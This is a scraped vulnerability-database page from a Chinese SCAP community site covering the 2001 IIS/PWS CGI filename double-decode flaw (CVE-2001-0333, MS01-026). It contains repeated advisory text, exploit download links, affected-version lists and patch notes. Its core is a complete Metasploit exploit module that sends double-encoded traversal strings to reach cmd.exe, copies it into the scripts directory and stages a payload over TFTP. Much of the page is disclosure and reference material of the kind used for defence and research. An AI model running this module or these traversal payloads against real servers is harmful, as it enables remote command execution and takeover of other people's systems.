A flaw in IIS involves a third undocumented action: Typically, IIS decodes only the CGI parameter at this point, yet the previously decoded CGI filename is mistakenly decoded twice. If a malformed filename is submitted and circumvents the initial security check, the undocumented procedure will decode the malformed request, possibly allowing the execution of arbitrary commands.
     
Note that arbitrary commands will be run with the IUSR_machinename account privileges. Reportedly, various encoding combinations under Windows 2000 Server and Professional may yield different outcomes.
     
Personal Web Server 1.0 and 3.0 are reported vulnerable to this issue.
     
The worm Nimda(and variants) actively exploit this vulnerability.

http://www.exploit-db.com/sploits/20840.tgz		

- 漏洞信息 (20841)

MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (7) (EDBID:20841)
windows remote
2001-05-15 Verified
0 Gary O'Leary-Steele
N/A [点击下载]
source: http://www.securityfocus.com/bid/2708/info
      
Due to a flaw in the handling of CGI filename program requests, remote users can execute arbitrary commands on an IIS host.
      
When IIS receives a CGI filename request, it automatically performs two actions before completing the request:
      
1. IIS decodes the filename to determine the filetype and the legitimacy of the file. IIS then carries out a security check.
      
2. When the security check is completed, IIS decodes CGI parameters.
      
A flaw in IIS involves a third undocumented action: Typically, IIS decodes only the CGI parameter at this point, yet the previously decoded CGI filename is mistakenly decoded twice. If a malformed filename is submitted and circumvents the initial security check, the undocumented procedure will decode the malformed request, possibly allowing the execution of arbitrary commands.
      
Note that arbitrary commands will be run with the IUSR_machinename account privileges. Reportedly, various encoding combinations under Windows 2000 Server and Professional may yield different outcomes.
      
Personal Web Server 1.0 and 3.0 are reported vulnerable to this issue.
      
The worm Nimda(and variants) actively exploit this vulnerability.

http://www.exploit-db.com/sploits/20841.zip		

- 漏洞信息 (20842)

MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (8) (EDBID:20842)
windows remote
2001-05-15 Verified
0 Roelof
N/A [点击下载]
source: http://www.securityfocus.com/bid/2708/info
       
Due to a flaw in the handling of CGI filename program requests, remote users can execute arbitrary commands on an IIS host.
       
When IIS receives a CGI filename request, it automatically performs two actions before completing the request:
       
1. IIS decodes the filename to determine the filetype and the legitimacy of the file. IIS then carries out a security check.
       
2. When the security check is completed, IIS decodes CGI parameters.
       
A flaw in IIS involves a third undocumented action: Typically, IIS decodes only the CGI parameter at this point, yet the previously decoded CGI filename is mistakenly decoded twice. If a malformed filename is submitted and circumvents the initial security check, the undocumented procedure will decode the malformed request, possibly allowing the execution of arbitrary commands.
       
Note that arbitrary commands will be run with the IUSR_machinename account privileges. Reportedly, various encoding combinations under Windows 2000 Server and Professional may yield different outcomes.
       
Personal Web Server 1.0 and 3.0 are reported vulnerable to this issue.
       
The worm Nimda(and variants) actively exploit this vulnerability.

http://www.exploit-db.com/sploits/20842.tgz		

- 漏洞信息 (F89962)

Microsoft IIS/PWS CGI Filename Double Decode Command Execution (PacketStormID:F89962)
2010-05-26 00:00:00
jduck  metasploit.com
exploit,arbitrary,cgi
CVE-2001-0333
[点击下载]

This Metasploit module will execute an arbitrary payload on a Microsoft IIS installation that is vulnerable to the CGI double-decode vulnerability of 2001. NOTE: This Metasploit module will leave a metasploit payload in the IIS scripts directory.

##
# $Id: ms01_026_dbldecode.rb 9376 2010-05-26 22:46:10Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex/proto/tftp'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::CmdStagerTFTP

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft IIS/PWS CGI Filename Double Decode Command Execution',
			'Description'    => %q{
					This module will execute an arbitrary payload on a Microsoft IIS installation
				that is vulnerable to the CGI double-decode vulnerability of 2001.

				NOTE: This module will leave a metasploit payload in the IIS scripts directory.
			},
			'Author'         => [ 'jduck' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9376 $',
			'References'     =>
				[
					[ 'CVE', '2001-0333' ],
					[ 'OSVDB', '556' ],
					[ 'BID', '2708' ],
					[ 'URL', 'http://marc.info/?l=bugtraq&m=98992056521300&w=2' ]
				],
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic', { } ]
				],
			'DefaultTarget'  => 0
			))

		register_options(
			[
				Opt::RPORT(80),
				OptBool.new('VERBOSE', [ false, 'Enable verbose output', false ]),
				OptString.new('EXETEMPLATE', [ false, 'Use this EXE as a template for the command stager',
					File.join(Msf::Config.install_root, "data", "templates", "template_nt4.exe") ]),
				OptString.new('CMD', [ false, 'Execute this command instead of using command stager', nil ])
			], self.class)
	end


	def dotdotslash
		possibilities = [
			"..%255c",
			"..%%35c",
			"..%%35%63",
			"..%25%35%63",
			".%252e/",
			"%252e./",
			"%%32%65./",
			".%%32%65/",
			".%25%32%65/",
			"%25%32%65./"
		]
		possibilities[rand(possibilities.length)]
	end


	def mini_http_request(opts, timeout=5)
		connect
		req = ''
		req << opts['method']
		req << ' '
		req << opts['uri']
		req << ' '
		req << "HTTP/1.0\r\n"
		req << "Host: #{datastore['RHOST']}\r\n"
		req << "\r\n"
		sock.put(req)

		# This isn't exactly awesome, but it seems to work..
		begin
			headers = sock.get_once(-1, timeout)
			body = sock.get_once(-1, timeout)
		rescue ::EOFError
			# nothing
		end

		if (datastore['DEBUG'])
			print_status("Headers:\n" + headers.inspect)
			print_status("Body:\n" + body.inspect)
		end
		disconnect
		[headers, body]
	end


	def check
		res = execute_command("dir")
		if (res.kind_of?(Array))
			body = res[1]
			if (body and body =~ /Directory of /)
				return Exploit::CheckCode::Vulnerable
			end
		end

		Exploit::CheckCode::Safe
	end


	#
	# NOTE: the command executes regardless of whether or not
	# a valid response is returned...
	#
	def execute_command(cmd, opts = {})
		uri = '/scripts/'
		exe = opts[:cgifname]
		if (not exe)
			uri << dotdotslash
			uri << dotdotslash
			uri << 'winnt/system32/cmd.exe'
		else
			uri << exe
		end
		uri << '?/x+/c+'
		uri << Rex::Text.uri_encode(cmd)

		if (datastore['VERBOSE'])
			print_status("Attemping to execute: #{uri}")
		end

		mini_http_request({
				'uri'     => uri,
				'method'  => 'GET',
			}, 20)
	end


	def exploit

		# first copy the file
		exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
		# NOTE: this assumes %SystemRoot% on the same drive as the web scripst directory
		res = execute_command("copy \\winnt\\system32\\cmd.exe #{exe_fname}")

		if (datastore['CMD'])
			res = execute_command(datastore['CMD'], { :cgifname => exe_fname })
		else
			execute_cmdstager({ :temp => '.', :linemax => 1400, :cgifname => exe_fname })
		end

		print_status("NOTE: The copied cmd.exe and payload binaries must be deleted manually")
		# NOTE: We try to delete the copied exe here, although if the payload is running,
		# we probably can't delete it due to it being in use...
		execute_command("del #{exe_fname}")

		handler
		disconnect

	end

end
    

- 漏洞信息

556
Microsoft IIS/PWS Encoded Filename Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial Vendor Verified, Third-party Verified, Coordinated Disclosure

- 漏洞描述

- 时间线

2001-05-15 Unknow
2001-05-15 2001-05-15

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

MS IIS/PWS Escaped Characters Decoding Command Execution Vulnerability
Design Error 2708
Yes No
2001-05-15 12:00:00 2007-01-29 08:18:00
Discovered and posted to Bugtraq by Nsfocus Security Team <security@nsfocus.com> on May 15, 2001. Posted in a Microsoft Security Bulletin MS01-026.

- 受影响的程序版本

Microsoft Windows NT 4.0 SP6a
+ Microsoft Windows NT Enterprise Server 4.0 SP6a
+ Microsoft Windows NT Enterprise Server 4.0 SP6a
+ Microsoft Windows NT Server 4.0 SP6a
+ Microsoft Windows NT Server 4.0 SP6a
+ Microsoft Windows NT Terminal Server 4.0 SP6a
+ Microsoft Windows NT Workstation 4.0 SP6a
+ Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Personal Web Server 3.0
+ Microsoft NT Option Pack for NT 4.0 0
+ Microsoft NT Option Pack for NT 4.0 0
+ Microsoft Windows 95
+ Microsoft Windows 95
+ Microsoft Windows 98
+ Microsoft Windows 98
Microsoft Personal Web Server 1.0
- Microsoft Windows 95
- Microsoft Windows 95
Microsoft IIS 5.0
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
+ Microsoft Windows 2000 Advanced Server
+ Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
+ Microsoft Windows 2000 Professional
+ Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
+ Microsoft Windows 2000 Server
+ Microsoft Windows 2000 Server
Microsoft IIS 4.0
+ Cisco Building Broadband Service Manager (BBSM) 5.0
+ Cisco Building Broadband Service Manager (BBSM) 5.0
+ Cisco Call Manager 3.0
+ Cisco Call Manager 3.0
+ Cisco Call Manager 2.0
+ Cisco Call Manager 2.0
+ Cisco Call Manager 1.0
+ Cisco Call Manager 1.0
+ Cisco ICS 7750
+ Cisco ICS 7750
+ Cisco IP/VC 3540 Video Rate Matching Module
+ Cisco IP/VC 3540 Video Rate Matching Module
+ Cisco Unity Server 2.4
+ Cisco Unity Server 2.4
+ Cisco Unity Server 2.3
+ Cisco Unity Server 2.3
+ Cisco Unity Server 2.2
+ Cisco Unity Server 2.2
+ Cisco Unity Server 2.0
+ Cisco Unity Server 2.0
+ Cisco uOne 4.0
+ Cisco uOne 4.0
+ Cisco uOne 3.0
+ Cisco uOne 3.0
+ Cisco uOne 2.0
+ Cisco uOne 2.0
+ Cisco uOne 1.0
+ Cisco uOne 1.0
+ Hancom Hancom Office 2007 0
+ Hancom Hancom Office 2007 0
+ Microsoft BackOffice 4.5
+ Microsoft BackOffice 4.5
+ Microsoft Windows NT 4.0 Option Pack
+ Microsoft Windows NT 4.0 Option Pack
Microsoft IIS 3.0
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0

- 漏洞讨论

Due to a flaw in the handling of CGI filename program requests, remote users can execute arbitrary commands on an IIS host.

When IIS receives a CGI filename request, it automatically performs two actions before completing the request:

1. IIS decodes the filename to determine the filetype and the legitimacy of the file. IIS then carries out a security check.

2. When the security check is completed, IIS decodes CGI parameters.

A flaw in IIS involves a third undocumented action: Typically, IIS decodes only the CGI parameter at this point, yet the previously decoded CGI filename is mistakenly decoded twice. If a malformed filename is submitted and circumvents the initial security check, the undocumented procedure will decode the malformed request, possibly allowing the execution of arbitrary commands.

Note that arbitrary commands will be run with the IUSR_machinename account privileges. Reportedly, various encoding combinations under Windows 2000 Server and Professional may yield different outcomes.

Personal Web Server 1.0 and 3.0 are reported vulnerable to this issue.

The worm Nimda(and variants) actively exploit this vulnerability.

- 漏洞利用

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

The 'execiis.c' exploit has been provided by Filip Maertens <filip@securax.be>.

Hux Flux <huxflux2001@hotmail.com> has provided the 'iisex.c' exploit.

Cyrus The Great <cyrusarmy@yahoo.com> has provided the 'IIS_CGI_decode_hole.pl' exploit.

Leif Jakob <bugtraq@jakob.weite-welt.com> has provided the 'IIS_escape_test.sh' exploit.

A.Ramos <aramos@lander.es> has provided the 'iisrules.tgz' exploit.

Gary O'leary-Steele <dilbert96@hushmail.com> has provided the 'Iisenc.zip' exploit.

Roelof <roelof@sensepost.com> has provided the following 'sensedecode.tgz' exploit.

MovAX <movax@softhome.net> has provided the following 'lala.c' exploit.

An exploit is available to members of the Immunity Partner's program. This exploit is not otherwise publicly available or known to be circulating in the wild. It may be obtained from the following URI:
https://www.immunityinc.com/downloads/immpartners/iis_doubledecode.tar

- 解决方案

We have conflicting reports regarding whether installing Windows 2000 SP2 after the patch (Q293826_W2K_SP3_x86_en) for this issue has been applied will re-expose this vulnerability. Although Microsoft has not confirmed the re-exposure of this issue, administrators should consider re-applying the patch.

Microsoft has released a patch that recitifies this issue.

Adriano Maia <shooter@unsekure.com.br> has provided a vulnerability check tool, which is available for download in the reference section.


Microsoft IIS 4.0

Microsoft IIS 5.0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站